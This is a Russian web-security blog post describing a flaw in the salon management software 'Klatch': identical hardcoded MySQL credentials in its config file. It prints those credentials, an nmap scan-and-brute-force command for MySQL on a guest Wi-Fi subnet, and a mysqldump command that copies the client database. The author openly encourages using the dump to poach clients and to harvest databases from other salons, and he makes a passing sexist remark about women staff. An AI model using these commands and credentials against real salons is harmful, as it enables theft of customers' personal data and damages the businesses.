portfob.ru

Блог web безопасности
  • Главная
  • О блоге
Главная  /  BugTrack • SECURITY TIME • Уязвимости  /  Уводим клиентскую базу с “Клатч”

Уводим клиентскую базу с “Клатч”

admin 28 ноября, 2017 BugTrack, SECURITY TIME, Уязвимости

Данная статья написана исключительно в образовательных целях. Я не преследую никакого злого умысла и, тем более, не подталкиваю никого к совершению противоправных действий.

Как то по опыту работы пришлось столкнуться с программой «Клатч», которую использую как систему управления предприятиями индустрии красоты. Подробнее с программой и как таковой системой вы можете ознакомиться на официальном сайте данного пациента https://evolution-it.ru

001-wnd31

В рамках изучения функционала для более плотного понимания программы была скачана демо-версия и развернута локально на компе. Вместе с программой так же ставится локально MySql сервер, где и хранятся данные – логины/пароли, данные клиентов, закупы, расходы, контрагенты, в общем вся чувствительная информация для бизнеса. В корне программы присутствует файл с настройками подключения к БД Klatch.ini, и вот пример его записи:

PHP
1
2
3
4
5
[connection]
host=127.0.0.1
user=metaUser
pswd=d3578efe-8825-432c-bf72-cd1d0a65de30
db=klatch_demo

Это, конечно, все интересно и занимательно, НО! Мне также довелось пощупать и лицензионную версию в действующем салоне красоты, и там точно такой же конфиг, всего лишь с разницей в название BD:

PHP
1
db=klatch

То есть, как следствие, логин и пасс к БД идет по умолчанию! Мы все прекрасно знаем, как часто люди редактируют дефолтные настройки, да ещё и к тому же женская аудитория, у которой мозг забит «красотой», или сисадмин, который получает копейки в подобных местах.

Сейчас очень популярно стало в публичных местах (и салоны красоты не исключение) ставить публичные wi-fi для клиентов. Как для любого бизнеса, утечка клиентских данных очень критична! Может увести клиентов к конкурентам при рекламной рассылке с более выгодными условиями, акциями и скидками.

Я решил смоделировать ситуацию, где установлена программа в сети под wi-fi’ем и ноут в качестве посетителя данной сети, и вот что мы получаем….

Подключаемся к сети и смотрим внутренний IP сети, командой “ipconfig”

photo_2017-11-28_00-56-08

Далее берем nmap и ставим на поиск открытого порта MySql в сети и его брут по дефолтному логин/пасс:

nmap -p 3306 -n —open —script mysql-brute —script-args userdb=mysql_user.txt,passdb=mysql_pass.txt 192.168.1.0/24

photo_2017-11-28_01-06-43

Запросом “mysqldump -h 192.168.1.233 -u metaUser -pd3578efe-8825-432c-bf72-cd1d0a65de30 klach > dump.sql” дампим к себе БД, где и есть заветная клиентская база данных клиентов.

Отличненько!!! Вот теперь можно заняться промывкой мозгов, потенциальных клиентов и продолжить собирать базы с салонов использующих данную программу.

Это еще не всё!  Пользователь metaUser имеет файловые привилегии, что позволяет читать и создавать файлы со своим содержимым, что раскрывает для нас дополнительный вектор атаки, но это уже совсем другая история.

shooterscreenshot-166-28-11-17

Previous Article
Next Article

Related Posts

  • Уязвимость в плагине PPOM for WooCommerce Pro version 23.2

    Уязвимость в плагине PPOM for WooCommerce Pro version 23.2

    22.09.2021
  • xss yandex map

    XSS в сервисе Яндекс-карты

    06.03.2020
  • JS/Redirector.NKN

    Как вирусы убивают скрипты сайта

    22.10.2018

Рубрики

  • SECURITY TIME
    • BugTrack
    • Уязвимости
  • Мои записки
  • Прочие
  • Шпаргалки

Свежие записи

  • Шпаргалка по Burp Suite
  • Уязвимость в плагине PPOM for WooCommerce Pro version 23.2
  • Памятка по SQL-инъекциям
  • XSS в сервисе Яндекс-карты
  • Как вирусы убивают скрипты сайта
  • Символы, о значении которых мы и не догадывались
  • Уводим клиентскую базу с “Клатч”
  • Exploitation of the Vulnerability in Plugin for WordPress «Wordfence Security»
  • Как защитить сайт от копирования
  • Старое о главном – проблемы администраторов серверов
Tweets by winstrool
Home page of Winstrool |